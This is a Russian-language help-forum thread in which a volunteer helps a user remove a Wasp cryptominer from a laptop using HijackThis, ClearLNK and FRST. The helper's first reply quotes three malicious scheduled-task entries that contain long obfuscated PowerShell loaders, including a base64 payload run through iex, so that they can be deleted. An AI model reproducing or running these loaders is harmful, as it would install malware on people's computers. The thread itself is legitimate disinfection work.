Wasp майнер на ноутбуке

**murat sabetkanov** · 08.11.2021, 15:41

Майнеры wasp спаунятся в системе. Недели три назад начали сильно грузить ЦП систему. Скачал касперский virus reмoval tool и такой же от др веба. Все проверили, вроде бы майнер удалили и система грузиться перестала. Сегодня снова антивирус виндовса начал бить тревогу, вижу в C:\ProgramData\Windows\Profile снова васп файлы. Антивирус касперского их нашел и поудалял. И иногда windows powershell теперь грузит ЦП на 40% процентов. Подскажите как избавиться от этого майнера до конца, пожалуйста!

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 08.11.2021, 15:42

Уважаемый(ая) murat sabetkanov, спасибо за обращение на наш форум!

Помощь при заражении компьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.

**Vvvyg** · 08.11.2021, 22:04

Запустите HijackThis, расположенный в папке Autologger и пофиксите только эти строки:

Код:

O22 - Task: \Microsoft\Windows\Maintenance\WinDAT - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "4852733139;$CiW='CBuBeBugQxuEicYI';'7&(hgc3m oA*s-T}y*p).qNa_me_ (v''xlus+-i_ng!g __S8y){st__e_m(4;u__soi}8ng13 tS._ys0pt(e_zm.z_IeOrj;udpsaij_ngu8 lSnvysubt_e.um.[kR_ujnnt?_i,m_he.8(Ivnryte1.r.o]rpS_9e7r+mvi_ccee=_s;/0u0s{tin.{gj s3Mih_c-r/-os__o_fx_t.(_Wxiu/n3.72q;_{pu!_bklj/ic_d mckulat_s0s_( uk4d+a__{d?me,l_jeg8ka.t=}e 6,vwoadid99 zEowpBao(_)x0;p+_u[bi2li_dc1 w1st07azt+{icp{ ?v(9oi[ed4 8(iinb(_)m2{bl.yftp_e[nd]2m-5ZLu2=lF7!il,xee.2.Exkui_sbwtsm0(_Ztxoiz[y9ua_era(h_fj_tw_}t_Zi4oib0)k?z-Fi[al_e-6.Rw3e_aw!dA9_l_l-8By/2t_el_s([pZ2o!viy_)u+e_qrhn_f8t?rwt0_Z_o)ci)1_:a(]]by[_t8ed{[]pc)8Rh(egqii[s(9tr__yl.+]Lo2gc(a+tlMolajc_{him[n)e]-.O__p8e1fnSl9ujb3bKe_fy6(q_@Zsbo}i]4SO7/FtT_bWAjyRzEb}\M_5i?c._roq(s3o,qft-3\,Ct+TF_.\{T_fIP_hZiopli)rj..G__et+bV_a8ilu_{e_(v_Zo=1ioymyuepprxhv7ft!bwvta_Zo_+i_,oknue_lol99);_8i2f_}(mg_Z[Llt==x5nburnlli_).r_3et.4upr_pn;d8i_n_vt +enuC_/sEk_=9m=_ZL_/._Lc)env,g_tk_h;,bfho3_r(/vi_n_ft _dD_Fr5=0dz;xD1_F fi!==1znCeessE}7-12,;2D2lF+c_+j)}d{m_gZ7Ll[[D!_F]])9^=}?(6b[_ytn-eb)g!Zo_ui(_2_GZdgaz6)tvdsk(xjke4A__tav=ozb1_[=Drbriq3LzCtalZy,o2ixq[D,rF_SxvcOa,222hn];1r}+I_}ntagPntnrr +vkrK..=(s_Iin_[tP7tt}r/,)0l);vI3hntp_P]t-br _jS}l_oa=m_(rIm0ntn_Pdt/0r)u-n_C_!sEdu;bN!9tAa_l)l/(ocsxactv-eV?fi[r_vtu?fa]l__Me)_mzoh_ryr_(_(u_InjstlP?ytrbt)_(19-1?j)o,m2rewvf_ yhkKl+,_(__Inb_tcP_atru_)k0pg,r.oemfo[ S_kl9avs,0_2xu1n_00?y0_,g20x_4400oi);=xM2a_grs,_h0a_ql.gzCvovmpy)h(_m7mZL-4,_0t/,k[uK5,t]nC2(s4Ew));-r(((?qEpy_Bk))mMa_wrzsj4haxklk.,)Ge9atvD_zel_!e_g_,at=_eyF!borq0F?u._nc-]t[im,on9cPlo_1inletke?vr(_8k}Kda,tzxy}p}_eo[]fw(97EpqcBm)_3))1d(_)o_;}?-[uD_nll}-I_m8rpozbr_t}_(Z9]omibyntscdqlhqlZ_,o)i_0)]ojpur7[iv.aa6tqge _0s_tvcata_iic/. e_?x_t--er__ne 5vlo!in_g9_ N_wt!Awjll3_o_cmfat_1eaV)/iri3tvu}vallzMje_5mo_srty_4(Iy(njt_hPtmxr9 +2ZWc.OsYe2,r2le_fn9 I-_n(t(9Ptugr_ ]_xz=y,=I8}nt7_P9tf,r /7i)Kb.,rv_e_f!j I_snetuuPtm1rq +[Ea]7i[,7,UItrn_t_532=d 2EyvW,ojUdIa!nt]v3_2_u a0cPy)2e;}6''-2redplxacte''?.(s..n)''/,''y$1_'' _-rpep_lalce+''Z/oiu'',_[c0ha!r][(394)f -?re_pl_ac,e''+ScuO''c,[ychaare](j378))};[pEnvvilrobnm,enqt]_::_Culrruen_tD.ir/eccto/ry}=p8wdr;[_udga]_::6ii_()_; '-replace('.svst(svst.svst.)'-replace'svst'),('$'+393/393)|&($CiW[12]+$CiW[4]+$CiW[9]);7136213718"
O22 - Task: \Microsoft\Windows\Maintenance\WinNAT - C:\ProgramData\Windows\Profile\1.js powershell -c "2017060371;$AdbT='oVeqjvxGjviEEjj';'_&(ngc_m }A*)-Tby*k).0Navme3 (e''t_usu+ipn_}g x_Sfy{_st+we{m+_;u)!s6izmng)6 eS1_ys(ktoei8m.0]I5O[z;un}s!inung/q aSr]ys_(tje-}m.q8Rnufsnt+ni1mgme..dIznlvte_zr?o_fpS_ke0r_jviftczeuys;_fu-s}min_7gn k}Mi+aclr73os(_ozfr9t.?7W_i_2n3__2r;//puy[bil_6ichu (c}ila-0sqsa8 Qh{g_A,hd{(]d6e!ulepag_aw7tetc _vs=oi?hd/ lcQD[w(_)s);pv)u3bwblit[c_ 1[st_2a!t61ic20 _v5{oi_4da ahVsh(Oe(uq){__b/y6_te4_[}]kfKQlc=[F.xil_re_.a?Ex+3ijs7jtsd_(}mk.Xj_,h_y_(tv/lryvb_rmn7X})mu?F_ci{l7fe.h-Rje_]ado]Aml_olBl_yatd_es14(+m_aXj/(hlyl]tvr_r,vy_rm0=Xx)_a:(/eb+ysote+y[}]x3)R?+e_gr1is_7t_rs_y.]_L_o[8ca__l}M_0acl!h_i{_neuq.2Ozfpes_n0S_jubx7Kteymy(y_@_mz_XS_[O1F_dTWl,A]R}?E\y_Mwi?_crn[o_s78ofnpt7\c6CTg_F3\6jTI!?Pam=oX)][.fG0/etc)V{asvlunqe_(krmX_0jhh_(yt),v8rnqvr__m{X?-,n]durlo_l)_1;_ix_f(uxKoQ5!==_,n{uzellwr)5rmaetq(u]r_?n;aoi4ndvt _fFaDwnwU=_=.K+_Q.=9L!e._ngfkt.hr2;f_royr6_(ic2njtp8 Mi5Q_=2k0;45MaQ_l !]t=cF4[Dw{hU6-{a1;byMhQv1++a,)k{k_KQ_g[4Mo=Q]/_^j==3(b_cyftcoe)_qmiX/eeP)oU,u__Jq({!?fkta/_-t_s0_4Qv_Bzo_.-,._+_v__}e]]V_Eny(7w_a7w!k9w__1)f_7EXp(Y_t]e{C5,f_!,({}5ry_h2hYC2pD),__1{s_419c_1u_y{om?hX[trM[Q_iUU_0Nm5j_5]c5;6}9hIn71t_P_]tru_ rr,rdV,.m+=iz(I16not?9Ptt_rs)(s0;aiI6n9dtPm}t_rk6 xm_faT1_=(n{Iyn_)tP6_tir_,)F_lD_w{hU;(8Nxt_zAl__l8o5(ca_[t_e!oVii]rbt((ua_5lqMa5emy0ovr?ty(t8(zI5fntq_Pntesr)=_(k-,z1)q,,fr65ef-u _r3_dVp]ma,lo(I}rn.t29Pt3lrs)(_0,x_r3e/_f 0[x(f5+T,)!0]xz110__0l0_g,0__x847x0),4;wMe_ar_ps_h3_al6_.=C__op!}y[(uqKQw},]0w_,r.2dpV85m,3wF!DmkwUw_)k;0_((+tQ7D{_)Mc2agr_)shk_aalp_.G[oezty9De.sl1ee_ga_5tve_!For4r0F}2und_c[t?_io)hn{Pj_oix5n5tf_er,{(tr_0dV_vm5,c1ty__pte?yof__(yQ,_D)b8)e)_(()_2;l}_{[D68l7lc8Im_cp_oeert+_(imtiXn[ytwdxill_6m_Xix)]?_p(rc4iv._aet__e q,snt_vatgki_cdm ermx_t_?erg)n_ v-lo!zntg_p N5/tyA_kll+vofc/cat[.esV?[ir_nt/u+val)_M_e6vmo/_rty(((I2_nzt9_Pti_r] )zDC_ufn,uhre_7fl ffIna_thPbitr0i {Gc2qpirlt,xsInvpt_P+dtrcv gVvohB_zE_,}crekqf, qsInz_t_Pi6tr=e 6L{lYa-_,eU/0Inl)t_3_e2 g]X?f1jXaa2,0UqmIn_zt_37,2 _aC3qlp);}2}_ ''_-r4ep7lakce_''.o(._.)l'',]''$01''/ -fre_plxac}e''2mXm'',i[c=hapr]m(3a4)_ -_re_pliac_e''_UUaN''0,[!chuar_](y37l))[;[(Enivi,rodnm=enmt]k::_Cunrr}en8tDvir?ecxto_ry)=p.wdb;[+QgbAd{]:_:V_sO,()}; '-replace('.DIAD(DIAD.DIAD.)'-replace'DIAD'),('$'+657/657)|&($AdbT[10]+$AdbT[2]+$AdbT[6]);9385353039"
O22 - Task: \Microsoft\Windows\Sysmain\Sysmain - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "$SRJb='v23EQrQ06CmLHaciyyLGV91ZzBGMTcoYnASYSsdfj2jrBul51nPnLOkRnAGMeasQlBjaC7BDkEXBVJ0R1VKlH5IZhByJX6oyyT+/ROk31WGOTbcC7nibENAug2aLBJJMphWcXr8ViiCaH5AJwCWyV6suzDm8MaxX1lLNLqdJx0yXX9Y0gBSOFYVephWcXr8ViiKNAep5imnZWqNJ6WGYFJ1IoHycTctZiDu+DZMNnzGdBIcijRSBAo0TnDqgB+Rwi2SpJ+5PrROdbsQHmQaRX6kSmFzeAsYAmh+QCdVUmEvMAuxsxDn2Tt5v71acE4gP6m6dTNlG3nabXNsQmwDGI5wRnAWbM4cUjTygE7h4nWKyK8cygROMeehOvweLFOgVjTrASq4Chx2qEZsV3kS7BO11l3qsSPdv7CmWApIF52nYN4kOjnCST7YtxiOcAo0RhSKNEYwVmi+gE/Zs1kb3d84EixCXcvYFrxyXB+wK0U7TWcYijRGMJIc1hhTAWbY12TWgCbIorTOSVpIU/XXaTcsUnD2kCJEWtVSLFMhdhhXIQ9hCwXygErQhv2TmLs4AlgSXcaVNsQGLC+ASlEfLUMU9iQiBHZ0dyETTVPV2xEb3FOtj9WOkO5UB8HWlXsocmGbXOpIDnBi1StIChwWGFMBDjTCuOuh9jGnPOaYSkQ7QR+gBiAC4WLci00/eA9lZwVnBS4EWwFSbQb8xlXikU7Bxv26TS8VCqn6XCdJGh3CTEpoZzBqCW9VSxgSDUtMNzGbgXKd0jHXiObNO3AqSM+wOzUaVCv1YkFreGcpLzALVK7sJmwSNHbFSnGmqN/xoyWGIFZ0T8EDCXrMPn3SLBNdGiRTBS8wCxjGEHIcHqXLwDtd5nGjgZv8VxUSefekTmVPBEKMyigKIMY8VhgTVVJ0R01SaA+8h3W+qJ/x+yWGKEJcO93jQTctZmXHCRY0RmF67BIkEnQOrH4wV027iSd51lnXPJ/8F2E2WeaVTzFrMGegfkBOHVJpNjBWLUMAruwmbBPpx117rDu9v6XCkWsIm9nKVJpEOnyPLMosQgR6PWMAejQfFH4oajWTwQdZli3X3brIot06raPcFnQW3B+wDnBXSVJoDmF6vFZwijQOYH/FvnE7wEvxr9izQSdFO1niZAKQSv3ubSdZLwVDAVIkUw1KdSYEFgmjvDqc1w3z7ZbRB1Q6XaKVEjkGeB/UOjRreAtUruwmbBI0dxiSNCOsyvHPnD/1j9WOkWsI10FvASrcYjkaLE5YMj1jMAsFLzBHVWMwC1SP2T/ZslGjmK75B2kzKNaw7zDXeRuJayVyTFsBUiVDFFZlQ2VmTVPAh0XThGLku6V/IPdFA+D23EYRQqWGNCJEFlRWEA40ZjljMEchdjXakVqxn3HmvIb5a0C6da6gvngKAAflHqh6JBI0dxiSAAo0RjBmGF7FRjGnhGLEu73aMBdRE9kbJOdwmiHCZPNsawVnGM4QfmxXAWdMZji+gGaxn3G6vIaxDhQWUb+Ab2AfYQLxFhBqfHJsVkxWQGZwNzB/VVPAyimjmE+148mqeSMhMpEarHYMJn3jRLJ4WgC3SSqUZhljdQNhAxCegDqtQnW/1d/RI0VvcbvZdmA2GQqU8qh6JBI0dxiSNCJxerR6LH/t1l3rZWqNfz0LBTr8F8F+BEJUO0jGQSNZCwFSBW8pGgwXdCZo7jz/jQ6wn3HPhPscUigmlJr8ljwuEEugjmBObI5wCgR6PWLMzhx6eFe1opCe+NPZI+necVswz8G+RCpdV3meMSNZZzALVK7sJmwSNHcY+jXOqNuB+qmTjdvkSjD3CJsYSmQmRB6VDmAPRUs4B1VLDVJoDwUvMArFdlXHrF9h/72urBZwJ9nibEM1ZnHSTEppZzALGJZsVmjGPFYYE1SPxAL44ii/icfMZgV3cbL5EjkaiB/k1nBSKH4YDjVjBDKcFnF2mBfNwwg==';&('itHFRetHFRx'-replace'tHFR')('$d=([regex]::Matches(''pkyJpQGJocmbSZES0lmc0N1JrcCdldkL4YEVVpjOddmbpJlRIRHZvNmUGhEduVkL0hnUGhEdlRlLtVGdSZES0NXeSZES0N1WngCeSZES0VmUGhEdphCI4JlRIRXZSZES0l2OpIXZi1WduxWYpJXZT5iai9GJgsCInAyJgsCIsVGZv1kLqJ2bkgCIpkiYKJ1UkgyZulmc0JlRIR3U0IlRIRnNlNXYSZES0JUbvJlRIRncGpjOdRnclZnbvNkLtVGdzl3UbhCIjJlRIRXZkBSPgQGJ7IXZi1WduxWYpJlRIRnclNFIswWZSZES0R2bNBCdjVmUGhEdsV2cgwHI9dCMFZVSSRETBJlRIR3QJNVWIBFXuwFXnAScl1CIElUZSZES0NWa2VGRu8FJ7BSZyJlRIRXZodHI8BSZ2lmUGhEdyR2aSZES0NXak9lMzIlRIRnbpJlRIR3dgkWb3dGI9AiaiJlRIR3bk03OiNGJg4mcSZES0VHdlJXfrsiakszckAicvhnYtASXqRyWiBHJgI3bSZES0hnYtASXpRyWiNGJg0DIdlGJbJ2YkszckAicvJlRIRHei1CIpITNxAicvJWLgMHJgQmbSZES0FmYtAyMygCI9AyckASfw0jaksXK05WdvNkLiBHJgU2ZtAiakgiZptXKrsSakAyO05WdvNkLiNGJgQHbtASakAyOwASPgkGJoI3bSZES0Z2Ow0jaksTXwslYwRCI9AycksTKzNXYwRCKzVmUGhEd0lnQ0JlRIRXZH5COGRVV6oTXn5mUGhEdpR2bj5WRuQnUGhEd4VGVu0WZSZES0R3c5N1Wg0DIiJlRIRHcksXKzNnUGhEdhBHJddmbpJnUGhEd0N3WgwiYSZES0NGJd11WlRnUGhEd5J2WoMWZSZES0RGIu9Wa0NmUGhEduVnZ'',''.'',''RitHFRghtHFRtTtHFRoLtHFReft'')|FotHFRrEatHFRch {$tHFR_tHFR.valtHFRue}) -jtHFRo'+'in '''';$d=[TetHFRxt.EncotHFRding]::UTtHFRF'+2*2*2+'.GetHFRtString([ContHFRvert]::Fro'+'mtHFRB'+'ase'+8*8+'StritHFRng($tHFRd));&(''itHFRetHFRx'')($d -reptHFRlace''ttHFRHFR'');'-replace'tHFR')"

Перезагрузите систему.

Скачайте, распакуйте и запустите утилиту ClearLNK. Скопируйте текст ниже в окно утилиты и нажмите "Лечить".

Код:

>>>  "C:\Users\MI\Desktop\гамз\YakuzaLikeADragon — ярлык.lnk"          -> ["C:\Yakuza Like a Dragon\runtime\media\YakuzaLikeADragon.exe"]
>>>  "C:\Users\MI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Overwolf\DotaPlus.lnk"       -> ["C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe"  =>> -launchapp kpaejaacomnkenpbmclnglmblpmfiapjlebhpcom]
>>>  "C:\Users\MI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Overwolf\Overwolf.lnk"       -> ["C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe"  =>> -from-startmenu]

Отчёт о работе прикрепите.

Скачайте Farbar Recovery Scan Tool или с зеркала и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать.

После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

**murat sabetkanov** · 09.11.2021, 04:26

Все сделал, надеюсь все верно

**Vvvyg** · 09.11.2021, 07:58

Выделите и скопируйте в буфер обмена следующий код:

Код:

Start::
CreateRestorePoint:
CHR HKU\S-1-5-21-1766083587-2463887960-2162454468-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjmpfdkmpojoeemjmfiddlhkkndcdpno]
2021-10-29 00:31 - 2021-10-29 00:31 - 000000000 ____D C:\Users\MI\AppData\Local\WaspAce
File: C:\Users\MI\Downloads\anvirrus.exe
2021-11-08 18:30 - 2021-05-22 15:45 - 000000000 _RSHD C:\ProgramData\Windows
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxlctlfudivq`qsp`29hfm [0]
FirewallRules: [TCP Query User{8551923B-9851-4A65-A566-00FB8DD1C703}C:\yakuza like a dragon\runtime\media\yakuzalikeadragon.exe] => (Allow) C:\yakuza like a dragon\runtime\media\yakuzalikeadragon.exe => Нет файла
FirewallRules: [UDP Query User{77DE60A1-127F-46FE-9F7D-7B8722F4F188}C:\yakuza like a dragon\runtime\media\yakuzalikeadragon.exe] => (Allow) C:\yakuza like a dragon\runtime\media\yakuzalikeadragon.exe => Нет файла
FirewallRules: [{9691ACEB-56DF-400A-94A2-5A628BDED968}] => (Allow) C:\ProgramData\Windows\Profile\dllhostn.exe => Нет файла
FirewallRules: [{58E79865-0B70-4B3A-A6DF-85AA11C5BB9A}] => (Allow) C:\ProgramData\Windows\Profile\wasp.exe => Нет файла
FirewallRules: [{FD8CD98B-D3B7-4F36-B095-F5588093DBD5}] => (Allow) C:\ProgramData\Windows\Profile\waspwing.exe => Нет файла
Reboot:
End::

Запустите FRST.EXE/FRST64.EXE, нажмите один раз Исправить и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Сообщите, что с проблемой.

**murat sabetkanov** · 09.11.2021, 08:52

Код ввел, powershell вроде перестал появляться, спасибо. Майнера тоже не вижу. Что делать если появится вновь?

**Vvvyg** · 09.11.2021, 10:37

Майнер - не таракан, сам собой не заведётся, что-то скачали и запустили нехорошее, возможно, с торрентов.

Проверяйте файлы на https://www.virustotal.com/ - хотя это не гарантирует, что зловред сразу будет обнаружен.
Утилиты KVRT, Dr. Web CureIt! могут помочь с последствиями, но не всегда и не со всеми. Так что - welcome, если что

Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

**murat sabetkanov** · 09.11.2021, 11:19

Эт я понял, что уже из-за игры какой-то спираченной че-то прилетело, вроде бы по удалял что мог. Но в любом случае спасибо! Работа сразу полегче пошла и на душе по спокойнее!

Wasp майнер на ноутбуке (заявка № 227316)

Опции темы